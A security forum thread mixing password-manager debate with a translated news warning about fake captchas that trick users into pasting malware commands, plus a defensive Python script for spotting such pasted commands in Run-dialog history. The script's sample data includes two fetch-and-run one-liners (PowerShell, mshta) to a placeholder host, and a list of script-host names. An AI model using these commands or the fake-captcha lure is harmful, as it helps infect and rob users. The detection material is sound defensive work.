Blog Post
I agree that strong, unique passwords are essential for security. Saving passwords can be safe, but I personally prefer to keep everything compartmented. This means that if one account gets compromised, there's no way for an attacker to use that information to access my other accounts.
This is exactly why I think using a password manager is a bad idea. Even if it's well-protected and encrypted, there's always a risk of it being compromised. If that happens, all stored passwords could potentially be exposed at once. Keeping passwords separate and manually managed reduces the impact of a single breach.
I wish I could find my old article on phishing so I could contribute more to the discussion, but it seems to be lost in one of the older security newsletters.
Keep up the great work!
- ElliotLH, 5 months ago, Hero+
I can try and see if I can find it since knowledge is power and I'd like to read it. Wish we had a search feature for our posts as it'd make it much easier (at least I don't need to search through my 10,272 posts haha).
--
Awesome newsletter as always :) I'll try to kick my brain into gear so I can add something valuable.
- danisoff, 5 months ago, Hero
Definitely, I have to agree. 😉
- ElliotLH, 5 months ago, Hero+
Sorry, dude, but I've not been successful. I've gone through all of the archived newsletters but most of them don't seem to have comments now, and I can't see it in your post history. The closest I can get is the comment below, but I'm not sure if that was the right one as I can't read it to check since it was a link to AHQ.
EA Forums Online Security Newsletter - September | EA Forums - 4979035
- Asmodeus566, 5 months ago, Hero+
Hey all, got some news for you out of Germany. I translated the news article into English and there might be some minor mistakes, but I am sure you all will get the meaning:
Checkbox as Bait: You're not a robot? Malware could be lurking behind captchas.
Everyone is familiar with checkboxes or image challenges to prove that you're a human and not a machine. This gives so-called captchas a certain level of trust. Cybercriminals exploit this mercilessly.
Anyone who currently encounters "I am not a robot" captchas when opening websites should be especially cautious after clicking the green confirmation checkbox. If access to the site is granted as normal after checking the box, everything is fine.
However, if another banner appears after the checkbox prompt with instructions to execute keyboard shortcuts, you've landed on a highly dangerous, manipulated website that intends to inject malware onto your computer. The Federal Office for Information Security (BSI) is currently warning against this again. In this case, abort immediately and close your browser.
If captchas require key combinations, something is wrong.
The attack method first appeared at the end of 2024 and was documented by the Swiss Federal Office for Cyber Security (BACS): The fact that the initial attempt was already a fake captcha becomes clear when a second banner appears, demanding the execution of various key combinations for alleged further verification.
The perfidious attack explained in detail:
- By checking the "I am not a robot" captcha box, a malicious command has already been copied to the clipboard. And here's what the cybercriminals want unsuspecting users to do next:
- In the second banner, they are then prompted to open a Windows input field using a keyboard shortcut.
- Using another keyboard shortcut, they are then supposed to paste the dangerous command from the clipboard into the input field and then execute it.
- Malware is then downloaded and installed from an attacker's server, with devastating capabilities such as: collecting information, for example from the operating system, web browsers, or messengers; stealing sensitive access or payment information, such as passwords or credit card details; attacking crypto wallets or authentication processes, such as those for online banking; executing any other commands; injecting any other malware.
Since many malware programs make profound changes to the system that cannot be easily reversed, victims should restart their entire computer as a precaution after an actual infection with the malware from the CAPTCHA attack, advises the BACS.
After an infection, victims must take action. This means in detail:
Reinstall the operating system completely and, if possible, restore their data from backups on external storage devices. If there is no backup, or no up-to-date backup, on external storage devices (which no user should be without), their data must of course be backed up before reinstalling the computer. Additionally, as a precaution, all online account passwords should be changed, especially those for email accounts.
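The warning above boils down to a simple pattern a defender can look for: a command that arrived via the clipboard, was pasted into the Windows Run dialog, and fetches something from a remote host. The script below is an added example (not part of the newsletter, the BSI or the BACS advice) that scores Run-dialog history entries for that pattern. The sample entries, the `malware-host.example` hostname, the `Finding` class and the scoring weights are all constructed for this illustration; on a real machine you would feed it the exported Run history (or a similar command-history source) from the endpoint under investigation.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of Win+R (Run dialog) history entries, the kind of list a
# defender pulls from an endpoint during triage. These lines are made up for
# this example; the last two imitate the pattern the BSI/BACS warning
# describes: a command pasted from the clipboard that fetches and runs
# something from a remote host. "malware-host.example" is a placeholder.
SAMPLE_RUN_HISTORY = [
    "notepad",
    "cmd",
    "ms-settings:display",
    'powershell -w hidden "Invoke-WebRequest http://malware-host.example/run.ps1"',
    "mshta http://malware-host.example/verify.hta  # I am not a robot - Ray ID 7f3a",
]

# Interpreters and download tools a pasted one-liner typically starts with.
SCRIPT_HOSTS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript", "curl", "certutil"}
URL_RE = re.compile(r"https?://", re.I)
# Fake-captcha pages append decoy text so the pasted line looks like a verification step.
DECOY_RE = re.compile(r"not a robot|captcha|verif(?:y|ication)", re.I)
# Loaders usually ask for a hidden window so the victim sees nothing happen.
HIDDEN_RE = re.compile(r"\bhidden\b", re.I)


@dataclass
class Finding:
    entry: str
    score: int = 0
    reasons: list = field(default_factory=list)


def _executable_name(entry: str) -> str:
    """Bare program name of the first token: no path, quotes or .exe suffix."""
    tokens = entry.strip().split()
    if not tokens:
        return ""
    name = re.split(r"[\\/]", tokens[0].strip('"'))[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def assess_run_entry(entry: str) -> Finding:
    """Score one Run-dialog entry; higher means more like a clipboard-pasted loader."""
    finding = Finding(entry)
    if _executable_name(entry) in SCRIPT_HOSTS:
        finding.score += 1
        finding.reasons.append("starts a script host or download tool")
    if URL_RE.search(entry):
        finding.score += 2
        finding.reasons.append("references a remote URL")
    if DECOY_RE.search(entry):
        finding.score += 2
        finding.reasons.append("carries captcha/verification decoy text")
    if HIDDEN_RE.search(entry):
        finding.score += 1
        finding.reasons.append("asks for a hidden window")
    return finding


def triage(entries, threshold: int = 3) -> list:
    """Return the entries worth a closer look, highest score first."""
    hits = [assess_run_entry(e) for e in entries]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


if __name__ == "__main__":
    for hit in triage(SAMPLE_RUN_HISTORY):
        print(f"[{hit.score}] {hit.entry}")
        print("      " + "; ".join(hit.reasons))
```

A plain `cmd` or `notepad` entry scores low on its own; it is the combination of a script host, a remote URL and the "verification" decoy text that separates a pasted fake-captcha command from everyday use of the Run dialog. If an entry like that shows up on a machine, the page's advice applies: treat the system as infected, rebuild it, and rotate the account passwords.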
- EA_Kuba, 5 months ago, Community Manager
Hey, danisoff thanks for sharing your thoughts about passwords. Exactly! There are two concepts for keeping your account passwords safe. While good password hygiene without password managers is possible, it might not be a solution for everyone. At the end of the day, this is a personal preference. Maybe a mix between your approach and using a password manager could be a good solution. Or maybe spread your passwords among a few password manager providers? Possibilities are endless ;)
Regarding your article about phishing. Is that this one? :)
- danisoff, 5 months ago, Hero
Well said! Always happy to hear from you EA_Kuba. Yes, using multiple password managers is definitely better than relying on just one. That would be a much safer compromise.
Also, thank you for finding the original post! Is it archived somewhere or is it just an old screenshot? Nonetheless, I really appreciate you taking the time to track it down. 🙂
- GawgPorkChop, 5 months ago, New Veteran
Good stuff. Quick story. Until 2016 I used one password for several sites. I stopped that and use long complex ones, never duplicated since then.
Here is the fun bit. I check my "dark web profile," on some google service a couple of months back.
Guess what? My re-used password is still listed. It's harmless as I have changed all, or closed accounts with it over 7 years ago, but it's still there. Kind of funny, but quite a shock at first.
There is no harm in me typing the password that I used, as I would never use anything without letters, capitals, numbers, and characters (% & $ etc.) now and haven't done so since back then.
My really old password was Morrowind. Oh the innocence! Oh the stupidity. I was playing that game back in 2012 or so and used it as my normal password for everything. Kind of embarrassed, but I totally, suddenly grasped how silly I had been almost a decade ago, so I am sharing.
BTW: Nothing was ever compromised. Luck probably. Also, doing that now in 2025 without 2FA and bank accounts would be emptied. CC bill would include a Porsche 911, my identity would be gone!!
Should have added, of course I deleted, and haven't used the account (an old hotmail one) since 2016.
Pretty amazed Google picked it up. Not that it will do anyone any good - I mean bad!